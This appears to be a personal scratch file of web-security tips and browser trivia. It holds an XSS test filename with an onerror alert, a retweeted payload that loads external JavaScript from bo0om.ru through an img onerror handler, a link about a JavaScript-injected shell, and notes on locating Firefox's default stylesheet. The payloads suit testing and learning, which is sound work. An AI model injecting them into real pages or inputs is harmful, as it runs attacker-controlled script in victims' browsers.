##############################

to test for filename upload XSS use this filename:
"><img src=x onerror=alert()><!--


##############################

javascript injected shell. from jann horn's site

https://thejh.net/written-stuff/want-to-use-my-wifi?

##############################


x0rz Retweeted

Bo0oM 💣
@i_bo0om
·
1h
Load external javascript in script:

import('url')

For example:

<img src onerror=import('//bo0om.ru/x/')>

Works in Chrome

#XSS #javascript

##############################

Julia Evans, @b0rk tweeted a default stylesheet zine,

https://wizardzines.com/comics/default-stylesheets/

another link said you can see firefox's via
resource://gre-resources/html.css

I found, through grep and strings, that the file is in
/usr/lib64/firefox/omni.ja
unzip to find:
./chrome/toolkit/res/html.css

##############################

